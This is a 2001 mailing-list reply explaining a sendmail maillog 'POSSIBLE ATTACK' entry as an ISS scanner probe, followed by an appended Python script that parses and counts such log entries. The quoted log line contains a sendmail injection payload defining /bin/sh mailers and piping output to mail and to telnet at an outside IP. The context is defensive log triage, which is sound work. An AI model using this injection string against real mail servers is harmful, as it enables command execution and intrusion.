
Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?



Hi again,
At 21:21 22-12-2001 -0000, Edward Bishop wrote:
>I've got four entries in my maillog which I've never seen before and which
>look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if
>it's of relevance to this list. If not, apologies - but I'd be grateful for
>suggestions as to good lists to try, hopefully with people as helpful as on
>this one.
>
>Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"

The above log entry was triggered by the ISS scanner. The person(s) running
the scan are looking for old Sendmail holes.  Versions of Sendmail (8.9.3
and after) are not vulnerable.

Regards,
-sm
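
An added example, not part of the original message: a small triage script that pulls "POSSIBLE ATTACK ... newline in string" entries out of a maillog, splits the payload on the ^M markers, and counts probes per source host. The sample lines, host names and addresses are constructed placeholders, and the function names are hypothetical.

```python
import re
from collections import Counter

# Constructed sample lines in the format of the entry quoted above
# (hosts and addresses are placeholders, not values from the thread).
SAMPLE_LOG = [
    'Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from '
    'scanner.example.net: newline in string "iss^M Croot^M Mprog, P=/bin/sh, '
    'F=lsDFMeu, A=sh -c $u^M R<"|mail probe@example.org">"',
    'Dec 22 15:17:02 ns sendmail[9841]: NOQUEUE: POSSIBLE ATTACK from '
    'scanner.example.net: newline in string "iss^M Mlocal, P=/bin/sh, A=sh -c $u"',
    'Dec 22 15:20:10 ns sendmail[9850]: fBMFKAx09850: from=<user@example.org>, '
    'size=1204, class=0, nrcpts=1, relay=mail.example.org [192.0.2.10]',
]

ENTRY = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ [\d:]{8}) (?P<host>\S+) sendmail\[(?P<pid>\d+)\]: '
    r'NOQUEUE: POSSIBLE ATTACK from (?P<source>[^:\s]+): '
    r'newline in string "(?P<payload>.*)"\s*$')

# sendmail.cf line types that appear in the quoted payload
KINDS = {'M': 'mailer definition', 'R': 'rewrite rule', 'C': 'class definition'}

def parse_entry(line):
    """Return a dict for a POSSIBLE ATTACK line, or None for anything else."""
    m = ENTRY.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # The log shows the embedded line breaks as "^M"; split on them to
    # recover the individual lines the sender tried to inject.
    parts = [p.strip() for p in entry.pop('payload').split('^M')]
    entry['injected'] = [(KINDS.get(p[:1], 'other'), p) for p in parts if p]
    # Flag payloads that try to define a mailer running /bin/sh.
    entry['shell_mailer'] = any(k == 'mailer definition' and 'P=/bin/sh' in p
                                for k, p in entry['injected'])
    return entry

def summarize(lines):
    """Return (parsed entries, Counter of probes per source host)."""
    entries = [e for e in map(parse_entry, lines) if e]
    return entries, Counter(e['source'] for e in entries)

if __name__ == '__main__':
    entries, per_source = summarize(SAMPLE_LOG)
    for source, count in per_source.most_common():
        print(f'{source}: {count} probe(s)')
```
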